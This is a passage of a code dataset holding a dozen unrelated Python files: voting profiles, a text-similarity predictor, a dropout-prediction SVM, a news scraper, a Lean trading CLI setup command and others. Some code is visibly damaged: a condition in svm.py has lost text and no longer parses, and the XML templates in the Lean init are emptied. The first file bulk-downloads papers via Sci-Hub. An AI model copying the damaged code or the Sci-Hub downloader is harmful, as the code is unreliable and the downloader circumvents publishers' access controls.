logger.debug('%s', result['err'])\n else:\n logger.debug('Successfully downloaded file with identifier %s',\n args.download)\n elif args.search:\n results = sh.search(args.search, args.limit)\n if 'err' in results:\n logger.debug('%s', results['err'])\n else:\n logger.debug('Successfully completed search with query %s',\n args.search)\n print(results)\n elif args.search_download:\n results = sh.search(args.search_download, args.limit)\n if 'err' in results:\n logger.debug('%s', results['err'])\n else:\n logger.debug('Successfully completed search with query %s',\n args.search_download)\n for paper in results['papers']:\n result = sh.download(paper['url'], args.output)\n if 'err' in result:\n logger.debug('%s', result['err'])\n else:\n logger.debug(\n 'Successfully downloaded file with identifier %s',\n paper['url'])\n elif args.file:\n with open(args.file, 'r') as f:\n identifiers = f.read().splitlines()\n for identifier in identifiers:\n result = sh.download(identifier, args.output)\n if 'err' in result:\n logger.debug('%s', result['err'])\n else:\n logger.debug(\n 'Successfully downloaded file with identifier %s',\n identifier)\n\n\nif __name__ == '__main__':\n main()\n\n# sh = SciHub()\n# title = \"\"\"Improving Traffic Locality in BitTorrent via Biased Neighbor Selection\"\"\"\n# meta = sh.find_meta(title)\n# result = sh.download(\n# meta.get('link')[0].get('URL'), path='./data/pdf/' + title + '.pdf')\n\n# search and download\nsh = SciHub()\n# retrieve 5 articles on Google Scholars related to 'bittorrent'\nresults = sh.search('nlp', 5)\n# download the papers; will use sci-hub.io if it must\nfor paper in results['papers']:\n logger.debug(paper)\n # paper['meta'] = None\n paper['doi'] = sh.find_meta(paper)\n sh.download(paper, './data')\n\n# # exactly the same thing as fetch except downloads the articles to disk\n# # if no path given, a unique name will be used as the file name\n# result = sh.download(\n# 'http://ieeexplore.ieee.org/abstract/document/1648853/', path='paper.pdf')\n\n# # result = sh.download('10.1145/2449396.2449413', path='paper.pdf')\n# # result = sh.download(meta.get('DOI'), path=title + '.pdf')\n# meta = {}\n# # sh = SciHub()\n# for paper in results['papers']:\n# paper['doi'] = sh.find_meta(paper)\n","sub_path":"scholar/scihub.py","file_name":"scihub.py","file_ext":"py","file_size_in_byte":20471,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"325989180","text":"\"\"\"\nPreference profiles and voters\n Preference profiles consist of voters.\n Voters in a profile are indexed by 0, ..., len(profile)-1\n Candidates are indexed by 0, ..., profile.num_cand-1\n The preferences of voters are specified by approval sets, which are sets of candidates.\n\"\"\"\n\n\nfrom abcvoting.misc import str_set_of_candidates\nfrom collections import OrderedDict\n\n\nclass Profile(object):\n \"\"\"\n Preference profiles consisting of approval sets.\n\n Properties\n ----------\n num_cand : int\n number of candidates or alternatives, denoted with m in the survey paper\n cand_names : iterable of str\n symbolic names for the candidates, defaults to '1', '2', ..., str(num_cand)\n _voters : list of Voter\n the list of voters, use `Profile.add_voter()` or `Profile.add_voters()`\n to add voters\n\n \"\"\"\n\n def __init__(self, num_cand, cand_names=None):\n if num_cand <= 0:\n raise ValueError(str(num_cand) + \" is not a valid number of candidates\")\n self.candidates = list(range(num_cand))\n self._voters = []\n self._approved_candidates = None\n self.cand_names = [str(cand) for cand in range(num_cand)]\n if cand_names:\n if len(cand_names) < num_cand:\n raise ValueError(\n f\"cand_names {str(cand_names)} has length {len(cand_names)}\"\n f\"< num_cand ({num_cand})\"\n )\n self.cand_names = [str(cand_names[i]) for i in range(num_cand)]\n\n @property\n def num_cand(self): # number of candidates\n return len(self.candidates)\n\n @property\n def approved_candidates(self): # candidates approved by at least one voter\n if self._approved_candidates is None:\n _approved_candidates = set()\n for voter in self._voters:\n _approved_candidates.update(voter.approved)\n return _approved_candidates\n\n def __len__(self):\n return len(self._voters)\n\n def add_voter(self, voter):\n \"\"\"\n Adds a set of approved candidates of one voter to the preference profile.\n\n Parameters\n ----------\n voter : Voter or iterable of int\n\n \"\"\"\n # note that we trust that each set in self._voters is a unique object even if\n # voter.approved might not be unique, because it is used as dict key\n # (see e.g. the variable utility in abcrules_gurobi or propositionA3.py)\n if isinstance(voter, Voter):\n _voter = voter\n else:\n _voter = Voter(voter)\n\n # there might be new approved candidates,\n # but update self._approved_candidates only on demand\n self._approved_candidates = None\n\n # this check is a bit redundant, but needed to check for consistency with self.num_cand\n _voter.check_valid(self.num_cand)\n self._voters.append(_voter)\n\n def add_voters(self, voters):\n \"\"\"\n Adds several voters to the preference profile.\n Each voter is specified by a set (or list) of approved candidates\n or by an object of type Voter.\n\n Parameters\n ----------\n voters : iterable of Voter or iterable of iterables of int\n\n \"\"\"\n for voter in voters:\n self.add_voter(voter)\n\n def totalweight(self):\n return sum(voter.weight for voter in self._voters)\n\n def has_unit_weights(self):\n return all(voter.weight == 1 for voter in self._voters)\n\n def __iter__(self):\n return iter(self._voters)\n\n def __getitem__(self, i):\n return self._voters[i]\n\n def __str__(self):\n if self.has_unit_weights():\n output = f\"profile with {len(self._voters)} votes and {self.num_cand} candidates:\\n\"\n for voter in self._voters:\n output += \" \" + str_set_of_candidates(voter.approved, self.cand_names) + \",\\n\"\n else:\n output = (\n f\"weighted profile with {len(self._voters)} votes\"\n f\" and {self.num_cand} candidates:\\n\"\n )\n for voter in self._voters:\n output += f\" {voter.weight} * \"\n output += f\"{str_set_of_candidates(voter.approved, self.cand_names)} ,\\n\"\n return output[:-2]\n\n def is_party_list(self):\n \"\"\"\n Is this party a party-list profile?\n In a party-list profile all approval sets are either\n disjoint or equal (see https://arxiv.org/abs/1704.02453).\n \"\"\"\n return all(\n len(voter1.approved & voter2.approved) in (0, len(voter1.approved))\n for voter1 in self._voters\n for voter2 in self._voters\n )\n\n def str_compact(self):\n compact = OrderedDict()\n for voter in self._voters:\n if tuple(voter.approved) in compact:\n compact[tuple(voter.approved)] += voter.weight\n else:\n compact[tuple(voter.approved)] = voter.weight\n if self.has_unit_weights():\n output = \"\"\n else:\n output = \"weighted \"\n output += \"profile with %d votes and %d candidates:\\n\" % (len(self._voters), self.num_cand)\n for approval_set in compact:\n output += (\n \" \"\n + str(compact[approval_set])\n + \" x \"\n + str_set_of_candidates(approval_set, self.cand_names)\n + \",\\n\"\n )\n output = output[:-2]\n if not self.has_unit_weights():\n output += \"\\ntotal weight: \" + str(self.totalweight())\n output += \"\\n\"\n\n return output\n\n\nclass Voter:\n \"\"\"\n A set of approved candidates by one voter.\n \"\"\"\n\n def __init__(self, approved, weight=1):\n self.approved = set(approved) # approval set, i.e., the set of approved candidates\n self.weight = weight\n\n # does not check for num_cand, because not known here\n self.check_valid(approved_raw=approved)\n\n def __str__(self):\n return str(list(self.approved))\n\n # some shortcuts, removed for clarity\n #\n # def __len__(self):\n # return len(self.approved)\n #\n # def __iter__(self):\n # return iter(self.approved)\n\n def check_valid(self, num_cand=float(\"inf\"), approved_raw=None):\n \"\"\"\n Check if approved candidates are given as non-negative integers. If `num_cand` is known,\n also check if they are too large. Double entries are check if approved_raw is given as\n list or tuple (or similar).\n \"\"\"\n if approved_raw is not None and len(self.approved) < len(approved_raw):\n raise ValueError(\n f\"double entries found in list of approved candidates: {approved_raw}\"\n )\n\n # note: empty approval sets are fine\n for candidate in self.approved:\n if not isinstance(candidate, int):\n raise TypeError(\n f\"Object of type {str(type(candidate))} not suitable as candidate, \"\n f\"only positive integers allowed.\"\n )\n if candidate < 0 or candidate >= num_cand:\n raise ValueError(str(self) + \" not valid for num_cand = \" + str(num_cand))\n","sub_path":"abcvoting/preferences.py","file_name":"preferences.py","file_ext":"py","file_size_in_byte":7206,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"206966869","text":"#encoding=utf8\n\nimport tensorflow as tf\nimport numpy as np\nimport sys\nimport csv\nsys.path.append('../')\nfrom drcn import DRCN\nfrom load_data import load_word_embed,load_char_embed,load_all_data\nfrom line_profiler_pycharm import profile\n\n\nnp.random.seed(1)\ntf.set_random_seed(1)\n\n@profile\ndef yuce():\n\n base_params = {\n 'num_classes':2,\n 'max_features':1700,\n 'embed_size':100,\n 'filters':300,\n 'kernel_size':3,\n 'strides':1,\n 'padding':'same',\n 'conv_activation_func':'relu',\n 'embedding_matrix':[],\n 'w_initializer':'random_uniform',\n 'b_initializer':'zeros',\n 'dropout_rate':0.2,\n 'mlp_activation_func':'relu',\n 'mlp_num_layers':1,\n 'mlp_num_units':256,\n 'mlp_num_fan_out':128,\n 'input_shapes':[(48,),(48,),(48,),(48,)],\n 'task':'Classification',\n 'lstm_units':64,\n 'num_blocks':1,\n 'word_max_features':7300,\n 'word_embed_size':100\n }\n\n org_text_path = sys.argv[1]\n org_change_path = sys.argv[2]\n ans_text_path = sys.argv[3]\n org_text = open(org_text_path, \"r\", encoding='utf-8')\n org = org_text.read()\n org_change = open(org_change_path, \"r\", encoding='utf-8')\n change = org_change.read()\n with open('zhanghong.csv', \"w\", encoding='gbk') as work_path:\n header = ['org', 'org_change', 'similarity']\n writer = csv.DictWriter(work_path, fieldnames=header)\n writer.writeheader()\n writer.writerow({'org': org, 'org_change': change, 'similarity': 1})\n\n word_embedding_matrix = load_word_embed(base_params['word_max_features'], base_params['word_embed_size'])\n char_embedding_matrix = load_char_embed(base_params['max_features'], base_params['embed_size'])\n\n base_params['embedding_matrix'] = char_embedding_matrix\n base_params['word_embedding_matrix'] = word_embedding_matrix\n\n backend = DRCN(base_params)\n\n p_c_index_test, h_c_index_test, p_w_index_test, h_w_index_test, same_word_test, _ = load_all_data(\n 'zhanghong.csv', maxlen=base_params['input_shapes'][0][0])\n x_test = [p_c_index_test, h_c_index_test, p_w_index_test, h_w_index_test]\n\n model = backend.build()\n\n model.compile(\n loss='categorical_crossentropy',\n optimizer='adam',\n metrics=['accuracy']\n )\n\n bast_model_filepath = 'best_drcn_model.h5'\n\n model.load_weights(bast_model_filepath)\n\n end = model.predict(\n x=x_test,\n )\n\n print(end[0][1])\n\n with open(ans_text_path, \"w\") as ans_text:\n if len(change) == 0:\n ans_text.write(str(0))\n else:\n ans_text.write(str(end[0][1]))\n\nif __name__ == '__main__':\n\n yuce()","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2703,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"82368600","text":"rq = input()\r\n\r\nfinal_quit = []\r\ntmp_tex = []\r\ntmp_number = []\r\ni = 0\r\nresult_text = ''\r\n\r\nwhile i < len(rq):\r\n if not rq[i].isdigit():\r\n if not rq[i + 1].isdigit():\r\n tmp_tex.append(rq[i])\r\n else:\r\n tmp_tex.append(rq[i])\r\n final_quit.append(''.join(tmp_tex).upper())\r\n tmp_tex = []\r\n elif rq[i].isdigit():\r\n if i + 1 < len(rq):\r\n if not rq[i + 1].isdigit():\r\n tmp_number.append(rq[i])\r\n final_quit.append(int(''.join(tmp_number)))\r\n tmp_number = []\r\n else:\r\n tmp_number.append(rq[i])\r\n else:\r\n tmp_number.append(rq[i])\r\n final_quit.append(int(''.join(tmp_number)))\r\n i += 1\r\n\r\n# print(final_quit)\r\n\r\nfor i in range(0, len(final_quit), 2):\r\n result_text += final_quit[i] * final_quit[i + 1]\r\nprint(f'Unique symbols used: {len(set(result_text))}')\r\nprint(result_text)","sub_path":"PyCharm_projects_2020/Fundamentals/text_processing/rage_quit.py","file_name":"rage_quit.py","file_ext":"py","file_size_in_byte":958,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"421837699","text":"import pandas as pd\n# import datetime\n# import csv\n# f1 = open('/Users/xuyujie/Desktop/102_1x_4T2015_emnlp/video_load.csv', 'r')\n# data = f1.readlines()\n# f1o = open('/Users/xuyujie/Desktop/102_1x_4T2015_emnlp/video_load_o.csv', 'wb')\n# wr = csv.writer(f1o, quoting=csv.QUOTE_ALL)\n# wr.writerow(\n# ['module_id', 'module_video_number', 'user_id', 'view_number', 'video_number', 'session_number', 'only_load_video',\n# 'only_load_view', 'straight_through', 'start_stop_num', 'skip_ahead_num', 'backward_num', 'slow_rate_num',\n# 'time_use', 'finish_video_num', 'start', 'end', 'duration'])\n# for i in range(1, len(data)):\n# temp = data[i].strip().split(',')\n# temp.append((datetime.datetime.strptime(temp[16], \"%Y-%m-%d %H:%M:%S\") - datetime.datetime.strptime(temp[15], \"%Y-%m-%d %H:%M:%S\")).total_seconds())\n# wr.writerow(temp)\n\ndf_video = pd.read_csv('/Users/xuyujie/Desktop/102_1x_4T2015_emnlp/video_load_o.csv')\ndf_label = pd.read_csv('/Users/xuyujie/Desktop/102_1x_4T2015_emnlp/label.csv')\nnew4 = pd.merge(df_video, df_label[['user_id', 'max_module_load']], on=['user_id'])\n\ndef fxy(x,y):\n if int(x[2])=y: # 1 means drop\n return 1\n\nnew4['label'] = new4.apply(lambda x: fxy(x['module_id'], x['max_module_load']), axis=1)\n\n# TODO: calculate and normalize features\nnew4_middle1 = new4.drop(new4[(new4.module_id == 'M05')].index)\n\nnon_student_id = [\n 0,\n 4449592,\n 4449592,\n 2361192,\n 2879433,\n 4556057,\n 4556369,\n 4532336,\n 5826408,\n 8421136,\n 6617725,\n 3988563]\n\nfor i in non_student_id:\n new4_middle1 = new4_middle1.drop(new4_middle1[(new4_middle1.user_id == i)].index)\n\n# # Drop Mode 1: delete users who only watched module1 section1 video\nnew4_middle1.groupby(['user_id'],as_index = False).sum()\n# only_section1_id = []\n# for j in only_section1_id:\n# new4_middle1 = new4_middle1.drop(new4_middle1[(new4_middle1.user_id == j)].index)\n# # Drop Mode 2: delete users whose total watched video is fewer than certain threshold\n# fewer_video_id = []\n# for k in fewer_video_id:\n# new4_middle1 = new4_middle1.drop(new4_middle1[(new4_middle1.user_id == k)].index)\n\nnew4_middle1['avg_view_number_video'] = new4_middle1['view_number']/new4_middle1['video_number']\nnew4_middle1['avg_video'] = new4_middle1['video_number']/new4_middle1['module_video_number']\nnew4_middle1['avg_view_number_session'] = new4_middle1['view_number']/new4_middle1['session_number']\nnew4_middle1['avg_only_load_video'] = new4_middle1['only_load_video']/new4_middle1['video_number']\nnew4_middle1['avg_only_load_view'] = new4_middle1['only_load_view']/new4_middle1['view_number']\nnew4_middle1['avg_straight_through'] = new4_middle1['straight_through']/new4_middle1['video_number']\nnew4_middle1['avg_start_stop_num'] = new4_middle1['start_stop_num']/new4_middle1['video_number']\nnew4_middle1['avg_skip_ahead_num'] = new4_middle1['skip_ahead_num']/new4_middle1['video_number']\nnew4_middle1['avg_backward_num'] = new4_middle1['backward_num']/new4_middle1['video_number']\nnew4_middle1['avg_slow_rate_num'] = new4_middle1['slow_rate_num']/new4_middle1['video_number']\nnew4_middle1['avg_time_use'] = new4_middle1['time_use']/new4_middle1['video_number']\nnew4_middle1['opened_finish_video_num'] = new4_middle1['finish_video_num']/new4_middle1['video_number']\nnew4_middle1['all_finish_video_num'] = new4_middle1['finish_video_num']/new4_middle1['module_video_number']\n\nfeature = new4_middle1[['avg_view_number_video', 'avg_video', 'avg_view_number_session', 'avg_only_load_video', 'avg_only_load_view', 'avg_straight_through', 'avg_start_stop_num', 'avg_skip_ahead_num', 'avg_backward_num', 'avg_slow_rate_num', 'avg_time_use', 'opened_finish_video_num', 'all_finish_video_num', 'duration']]\nlabel = new4_middle1[['label']]\n\nimport numpy as np\nfrom sklearn import svm\nfrom sklearn.model_selection import train_test_split\n\nlist_mat = feature.fillna(0).values.tolist()\nemnlp_mat = np.array(list_mat)\nlist_label = label['label'].tolist()\nemnlp_label = np.array(list_label)\n\n# from sklearn import preprocessing\n# X_train, X_test, Y_train, Y_test = train_test_split(emnlp_mat, emnlp_label, test_size=0.2, random_state=0)\n# X_train_scaled = preprocessing.scale(X_train)\n# X_test_scaled = preprocessing.scale(X_test)\n# clf = svm.SVC(kernel='linear', C=1).fit(X_train_scaled, Y_train)\n# clf.score(X_test_scaled, Y_test)\n# # print('done modelling')\n# print(clf.score(X_test_scaled, Y_test))\n\nfrom sklearn import preprocessing\nmin_max_scaler = preprocessing.MinMaxScaler(copy=True, feature_range=(0, 1))\nX_minmax = min_max_scaler.fit_transform(emnlp_mat)\n\n# TODO: feature selection\n# from sklearn.feature_selection import VarianceThreshold\n# sel = VarianceThreshold(threshold=(.8 * (1 - .8)))\n# sel.fit_transform(X_train_scaled)\n\n# 5-fold cross validation\nfrom sklearn.model_selection import cross_val_score\nclf = svm.SVC(kernel='linear', C=1)\nfrom sklearn.metrics import make_scorer, accuracy_score, precision_score, recall_score, f1_score\naccuracy = cross_val_score(clf, X=X_minmax,y=emnlp_label,cv=5,scoring=make_scorer(accuracy_score))\nprecision = cross_val_score(clf, X=X_minmax,y=emnlp_label,cv=5,scoring=make_scorer(precision_score))\nrecall = cross_val_score(clf, X=X_minmax,y=emnlp_label,cv=5,scoring=make_scorer(recall_score))\nf1 = cross_val_score(clf, X=X_minmax,y=emnlp_label,cv=5,scoring=make_scorer(f1_score))\nprint('Accuracy', accuracy)\nprint('Precision', precision)\nprint('Recall', recall)\nprint('F1 score', f1)\n","sub_path":"svm.py","file_name":"svm.py","file_ext":"py","file_size_in_byte":5512,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"115564359","text":"import requests\nfrom bs4 import BeautifulSoup\n\nimport sys\nsys.path.append('..')\nfrom SendMsg import SendMsg\nimport os\n\nurl = 'https://www.fmprc.gov.cn/web/wjbxw_673019'\n\n# print(sys.path)\nprint(123123, os.path.abspath('.'))\n\n\ndef get_news():\n res = requests.get(url)\n res.encoding = 'UTF-8'\n return res\n\n\ndef getLatestNews():\n res = get_news()\n soup = BeautifulSoup(res.text, 'lxml')\n first_parent = soup.find_all('div', class_='imbox_ul')[0]\n latest_news_title = first_parent.li.text\n latest_news_link = url + first_parent.a.attrs['href'][1:]\n return latest_news_title, latest_news_link\n\n\ndef read_txt():\n content = []\n with open('data.txt', 'r', encoding='utf-8') as f:\n content.append(f.read())\n if len(content)>0:\n return content[0]\n else:\n return ''\n\n\ndef write_txt(content):# 路径问题如何解决?\n with open('data.txt', 'w', encoding='utf-8') as f:\n # print('content: ', f.read())\n f.write(content)\n\n\ndef job_fmn():\n previous_value = read_txt()\n latest_name, latest_link = getLatestNews()\n\n if latest_name != previous_value:\n sendMsg = SendMsg()\n sendMsg.create_news(site_name='外交部', site_link='https://www.fmprc.gov.cn/web/wjbxw_673019/',title=latest_name, news_link=latest_link) \n sendMsg.send()\n write_txt(latest_name)\n else:\n print('There is no latest news')\n pass\n\nif __name__ == '__main__':\n job_fmn()\n # print(read_txt())","sub_path":"foreign_ministry_news/index.py","file_name":"index.py","file_ext":"py","file_size_in_byte":1484,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"2412126","text":"from oscar.apps.catalogue.search_handlers import SimpleProductSearchHandler as CoreSimpleProductSearchHandler\nfrom apps.catalogue.models import Product\n\n\nclass SimpleProductSearchHandler(CoreSimpleProductSearchHandler):\n def get_queryset(self):\n qs = Product.browsable.base_queryset().filter(display=True)\n if self.categories:\n qs = qs.filter(categories__in=self.categories).distinct()\n return qs","sub_path":"apps/catalogue/search_handlers.py","file_name":"search_handlers.py","file_ext":"py","file_size_in_byte":431,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"334632887","text":"import shutil\nimport tempfile\nimport zipfile\nfrom pathlib import Path\n\nimport click\nimport requests\n\nfrom lean.click import LeanCommand\nfrom lean.config import Config\nfrom lean.container import container\n\nCSPROJ = \"\"\"\n\n \n Exe\n net5.0\n \n \n \n \n\n\"\"\"\n\nIDEA_WORKSPACE_XML = \"\"\"\n\n\n \n \n \n \n \n \n \n \n\n\"\"\"\n\nVSCODE_LAUNCH_JSON = \"\"\"\n{\n \"version\": \"0.2.0\",\n \"configurations\": [\n {\n \"name\": \"Debug Python with Lean CLI\",\n \"type\": \"python\",\n \"request\": \"attach\",\n \"connect\": {\n \"host\": \"localhost\",\n \"port\": 5678\n },\n \"pathMappings\": [\n {\n \"localRoot\": \"${fileDirname}\",\n \"remoteRoot\": \"/Project\"\n }\n ]\n },\n {\n \"name\": \"Debug C# with Lean CLI\",\n \"request\": \"attach\",\n \"type\": \"mono\",\n \"address\": \"localhost\",\n \"port\": 55555\n }\n ]\n}\n\"\"\"\n\n\n@click.command(cls=LeanCommand)\ndef init() -> None:\n \"\"\"Bootstrap a Lean CLI project.\"\"\"\n current_dir = Path.cwd()\n data_dir = current_dir / Config.default_data_directory_name\n lean_config_path = current_dir / Config.default_lean_config_file_name\n\n # Abort if one of the files we are going to create already exists to prevent us from overriding existing files\n for path in [data_dir, lean_config_path]:\n if path.exists():\n relative_path = path.relative_to(current_dir)\n raise RuntimeError(f\"{relative_path} already exists, please run this command in an empty directory\")\n\n logger = container.logger()\n\n # Warn the user if the current directory is not empty\n if next(current_dir.iterdir(), None) is not None:\n logger.info(\"This command will bootstrap a Lean CLI project in the current directory\")\n click.confirm(\"The current directory is not empty, continue?\", default=False, abort=True)\n\n # Download the Lean repository\n logger.info(\"Downloading latest sample data from the Lean repository...\")\n tmp_directory = Path(tempfile.mkdtemp())\n\n # We download the entire Lean repository and extract the data and the launcher's config file\n # GitHub doesn't allow downloading a specific directory\n # Since we need ~80% of the total repository in terms of file size this shouldn't be too big of a problem\n with requests.get(\"https://github.com/QuantConnect/Lean/archive/master.zip\", stream=True) as response:\n response.raise_for_status()\n\n with (tmp_directory / \"master.zip\").open(\"wb\") as file:\n for chunk in response.iter_content(chunk_size=8192):\n file.write(chunk)\n\n # Extract the downloaded repository\n with zipfile.ZipFile(tmp_directory / \"master.zip\") as zip_file:\n zip_file.extractall(tmp_directory / \"master\")\n\n # Copy the data directory\n shutil.copytree(tmp_directory / \"master\" / \"Lean-master\" / \"Data\", data_dir)\n\n # Create the config file\n lean_config_manager = container.lean_config_manager()\n config = (tmp_directory / \"master\" / \"Lean-master\" / \"Launcher\" / \"config.json\").read_text()\n config = lean_config_manager.clean_lean_config(config)\n\n # Update the data-folder configuration\n config = config.replace('\"data-folder\": \"../../../Data/\"', f'\"data-folder\": \"{Config.default_data_directory_name}\"')\n\n with lean_config_path.open(\"w+\") as file:\n file.write(config)\n\n # Create files which make debugging and autocompletion possible\n extra_files = {\n \"LeanCLI.csproj\": CSPROJ,\n \".idea/workspace.xml\": IDEA_WORKSPACE_XML,\n \".vscode/launch.json\": VSCODE_LAUNCH_JSON\n }\n\n for location, content in extra_files.items():\n path = Path(Path.cwd() / location)\n path.parent.mkdir(parents=True, exist_ok=True)\n with path.open(\"w+\") as file:\n file.write(content)\n\n # Prompt for some general configuration if not set yet\n cli_config_manager = container.cli_config_manager()\n if cli_config_manager.default_language.get_value() is None:\n default_language = click.prompt(\"What should the default language for new projects be?\",\n type=click.Choice(cli_config_manager.default_language.allowed_values))\n cli_config_manager.default_language.set_value(default_language)\n\n logger.info(f\"\"\"\nSuccessfully bootstrapped your Lean CLI project!\n\nThe following structure has been created:\n- {Config.default_lean_config_file_name} contains the configuration used when running the LEAN engine locally\n- {Config.default_data_directory_name}/ contains the data that is used when running the LEAN engine locally\n\nHere are some commands to get you going:\n- Run `lean create-project \"My Project\"` to create a new project with starter code\n- Run `lean backtest \"My Project\"` to backtest a project locally with the data in {Config.default_data_directory_name}/\n\"\"\".strip())\n","sub_path":"lean/commands/init.py","file_name":"init.py","file_ext":"py","file_size_in_byte":6050,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"651718514","text":"from pythonds.basic.queue import Queue\n\ndef hotPotato(listOfNames, number):\n gameCircle = Queue()\n #add all people in list to a queue\n for person in listOfNames:\n gameCircle.enqueue(person)\n while gameCircle.size() > 1:\n #add everyone back to the front of the queue until the number is reached, then remove that person. Repeat until gameCircle is empty. \n for i in range(number):\n gameCircle.enqueue(gameCircle.dequeue())\n gameCircle.dequeue()\n print(gameCircle)\n return gameCircle.dequeue()\n\nprint(hotPotato([\"Bill\", \"David\", \"Susan\", \"Jane\", \"Kent\", \"brad\"], 7))\n","sub_path":"interactivePython/hotPotato.py","file_name":"hotPotato.py","file_ext":"py","file_size_in_byte":626,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"77140997","text":"import pandas as pd\nimport numpy as np\nimport matplotlib.pyplot as plt\n\ndataset = pd.read_csv('Data_age_salary.csv')\nX = dataset.iloc[:,:1].values\nprint(X)\nY = dataset.iloc[:,1].values\nprint(Y)\n\nfrom sklearn.model_selection import train_test_split\nX_train,X_test,Y_train,Y_test = train_test_split(X, Y, test_size=1/4, random_state=0)\n\nfrom sklearn.linear_model import LinearRegression\nregressor = LinearRegression()\nregressor = regressor.fit(X_train,Y_train)\n\nY_predict = regressor.predict(X_test)\n\nplt.scatter(X_test, Y_test, color=\"red\")\nplt.plot(X_test, Y_predict, color=\"blue\")\n\nplt.scatter(X_train, Y_train, color=\"red\")\nplt.plot(X_train, regressor.predict(X_train), color=\"blue\")\n\nplt.title('Linear Regression')\nplt.xlabel('Age')\nplt.ylabel('Salary')\nplt.legend()\nplt.show()","sub_path":"Code/my/LinerTest.py","file_name":"LinerTest.py","file_ext":"py","file_size_in_byte":780,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"413419396","text":"import loader\nimport scraper\nfrom typing import Callable, Dict\n\ndef _show_all():\n \"\"\"\n show all influencers in local influencers.JSON \n \"\"\"\n gen=loader.local.getlist()\n for i in gen:\n print(i.get('name',{}))\n print(i.get('ig',{}))\n\ndef _err():\n \"\"\"\n error function called if the operation passed is missing\n \"\"\"\n print('operation not available')\n\ndef _exit():\n \"\"\"\n close the CLI\n \"\"\"\n exit()\n \ndef _help():\n \"\"\"\n print available commands\n \"\"\"\n print(\"Commands list: \\n\\n\")\n for valid_op in op_list:\n print('\\u25A2 ',f'{valid_op}:\\n{op_list[valid_op].__doc__}')\n\n\nop_list: Dict[str, Callable] = {\n 'show_all': _show_all,\n 'exit':_exit,\n 'help': _help\n}","sub_path":"op/functions.py","file_name":"functions.py","file_ext":"py","file_size_in_byte":739,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"344465626","text":"# -*- coding: utf-8 -*-\n\nfrom google.appengine.api import users\nfrom google.appengine.ext import webapp\nfrom twitdobau.models import UserPrefs\nfrom twitdobau.handlers.base import BaseHandler\n\nclass MenuHandler(BaseHandler):\n def get(self):\n user = users.get_current_user()\n if user:\n options = (\"Bem Vindo, %s! (logout)\" %\n (user.nickname(), users.create_logout_url(\"/\")))\n else:\n options = (\"Logar.\" %\n users.create_login_url(\"/intl/pt-BR/\"))\n \n self.render('default/menu.html', {\n 'options': options\n })\n \nclass ProfilePage(BaseHandler):\n def get(self):\n user = users.get_current_user()\n userPrefs = UserPrefs.all().filter('user', user.user_id()).get()\n self.render('user/profile.html', {\n 'user': userPrefs\n })\n return","sub_path":"src/twitdobau/handlers/user.py","file_name":"user.py","file_ext":"py","file_size_in_byte":985,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"}